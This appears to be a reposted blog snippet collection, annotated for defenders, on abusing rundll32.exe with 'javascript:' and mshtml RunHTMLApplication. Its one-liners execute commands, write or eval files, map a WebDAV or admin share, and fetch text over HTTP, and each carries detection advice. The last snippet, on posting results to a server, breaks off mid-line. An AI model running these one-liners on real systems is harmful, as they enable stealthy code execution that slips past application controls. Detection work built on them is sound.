//Execute A Command
// What this does: rundll32.exe is handed a "javascript:" string instead of a
// normal DLL,export pair. The "\..\mshtml,RunHTMLApplication" part is what gets
// mshtml's RunHTMLApplication to evaluate the script that follows, which here
// creates WScript.Shell and calls Run("calc").
// Defender view: this is signed-binary proxy execution through rundll32 (MITRE
// ATT&CK T1218.011). With command-line process logging enabled (Security event
// 4688 or Sysmon event 1), alert on rundll32.exe whose arguments contain
// "javascript:" or "RunHTMLApplication", and on any child process it spawns.
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write ();
new%20Activ eXObject("WScript.Shell").Run("calc");
//Write To A File
// What this does: the script run inside rundll32.exe creates
// Scripting.FileSystemObject, calls CreateTextFile on c:\Temp\testfile.txt with
// the overwrite flag set to true, writes the single line "Test" and closes it.
// Defender view: the write is attributed to rundll32.exe, not to a script host,
// so look for file-creation telemetry (e.g. Sysmon event 11) whose image is
// rundll32.exe, correlated with a "javascript:" / "RunHTMLApplication"
// command line on the same process.
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";
fso=new%20ActiveXObject("Scripting.FileSystemObject");
a=fso.CreateTextFile("c:\\Temp\\testfile.txt",true);
a.WriteLine("Test");a.Close();self.close;
//Read and Execute From A File
// What this does: opens c:\Temp\testfile.txt through Scripting.FileSystemObject
// (mode 1 = ForReading), reads the whole file with ReadAll() and passes the
// text to eval(), so the file content runs as script inside rundll32.exe.
// Defender view: the command line shows only the loader; the code that
// actually runs is in the file. During triage, preserve the referenced file
// along with the process-creation record, and treat any rundll32.exe command
// line combining "javascript:" with FileSystemObject and eval as suspicious.
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";
document.write();fso=new%20ActiveXObject("Scripting.FileSystemO
bject");f=fso.OpenTextFile("c:\\Temp\\testfile.txt",1);eval
((f.ReadAll()));
//Map A Remote Share (WEBDAV)
// What this does: creates WScript.Network and calls MapNetworkDrive to map
// drive letter S: to the HTTPS URL shown, i.e. a WebDAV location.
// Defender view: a drive mapping initiated from rundll32.exe is unusual.
// WebDAV mappings on Windows normally go through the WebClient service, so that
// service starting and outbound HTTPS shortly after a rundll32.exe
// "javascript:" command line are additional signals (confirm against your own
// baseline). Egress filtering of WebDAV to untrusted hosts limits the exposure.
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";
n=new%20ActiveXObject('WScript.Network');n.MapNetworkDrive
("S:","https://live.sysinternals.com");self.close;
//Map A Local Share
// What this does: creates WScript.Network and maps drive letter S: to
// \\Localhost\c$, the administrative share of the local C: volume.
// Defender view: access to an administrative share is recorded by share-access
// auditing (Security event 5140) when that audit policy is enabled. Pair it
// with the originating rundll32.exe "javascript:" command line to separate this
// from routine administrative use of c$.
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";
n=new%20ActiveXObject('WScript.Network');n.MapNetworkDrive
("S:","\\\\Localhost\\c$");self.close;
//Read and Execute Commands From A File
// What this does: opens c:\Temp\Commands.txt for reading and loops until
// AtEndOfStream. Each line is appended to "cmd /c " and run through
// WScript.Shell.Run with the third argument true, so every command finishes
// before the next line is read.
// Defender view: the result is a series of cmd.exe children under a single
// rundll32.exe parent. Alert on the rundll32.exe -> cmd.exe parent/child pair
// (Security event 4688 or Sysmon event 1), and collect the commands file,
// because the executed commands do not appear in rundll32's own command line.
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";
document.write();fso=new%20ActiveXObject("Scripting.FileSystemOb
ject");f=fso.OpenTextFile("c:\\Temp\\Commands.txt",1);while
(!f.AtEndOfStream){t=new%20ActiveXObject("WScript.Shell");
t.Run("cmd%20/c%20"%20+%20f.ReadLine(),null,true);};
//Retrieve Commands From HTTP
// What this does: creates WinHttp.WinHttpRequest.5.1, issues a synchronous
// (third Open argument is false) GET to http://127.0.0.1/a.txt, and shows the
// response text with alert(). As written the response is only displayed; this
// snippet does not execute it.
// Defender view: rundll32.exe rarely has a reason to make HTTP requests, so
// network-connection telemetry with rundll32.exe as the image (e.g. Sysmon
// event 3) is a useful signal, especially alongside a "javascript:" command
// line. The request here is plain HTTP, so a proxy or network sensor can also
// see the URL and the response body.
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";
document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1") ;
h.Open("GET","http://127.0.0.1/a.txt",false);h.Send();
B=h.ResponseText;alert(B);
//POST results back to Server
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";
document.write();h=new%2
文章出处:Evi1cg's blog
原文链接:https://evi1cg.me/archives/121.html